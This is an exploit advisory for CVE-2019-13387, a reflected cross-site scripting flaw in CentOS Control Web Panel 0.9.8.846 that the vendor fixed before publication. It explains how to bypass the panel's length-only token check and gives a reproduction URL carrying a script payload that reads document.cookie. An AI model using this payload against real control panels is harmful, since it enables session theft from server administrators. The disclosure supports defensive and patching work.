Share
# Exploit Title: CWP (CentOS Control Web Panel) Reflected Cross Site Scripting  
# Date: 23 July 2019  
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak  
# Vendor Homepage: https://control-webpanel.com/  
# Version: 0.9.8.846  
# Tested on: CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)  
# CVE : CVE-2019-13387  
  
+++++++++++++++++++++++++++++++++  
# Description:  
+++++++++++++++++++++++++++++++++  
  
CWP Version 0.9.8.846 have implemented token in every URL to prevent cross site scripting.  
But the aplication checks only length of the token, this allows attacker to follow the token format to bypass XSS protection  
  
Refer CVE:2018-18324  
  
+++++++++++++++++++++++++++++++++  
# Steps to Reproduce  
+++++++++++++++++++++++++++++++++  
Example : https://[target.com]:2083/cwp_xxxxxxxxxxxxxxxx/user1/fileManager2.php?frame=3&fm_current_dir=</script><script>alert(document.cookie)</script>  
  
Parameter Name: fm_current_dir  
  
Attack Pattern for XSS: </script><script>alert(document.cookie)</script>   
  
+++++++++++++++++++++++++++++++++  
# PoC  
+++++++++++++++++++++++++++++++++  
  
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13387.md  
  
  
+++++++++++++++++++++++++++++++++  
# Timeline  
+++++++++++++++++++++++++++++++++  
2019-07-07: Discovered the bug  
2019-07-07: Reported to vendor  
2019-07-07: Vender accepted the vulnerability  
2019-07-15: The vulnerability has been fixed  
2019-07-23: Published  
  
+++++++++++++++++++++++++++++++++  
# Discovered by  
+++++++++++++++++++++++++++++++++  
Pongtorn Angsuchotmetee  
Nissana Sirijirakal  
Narin Boonwasanarak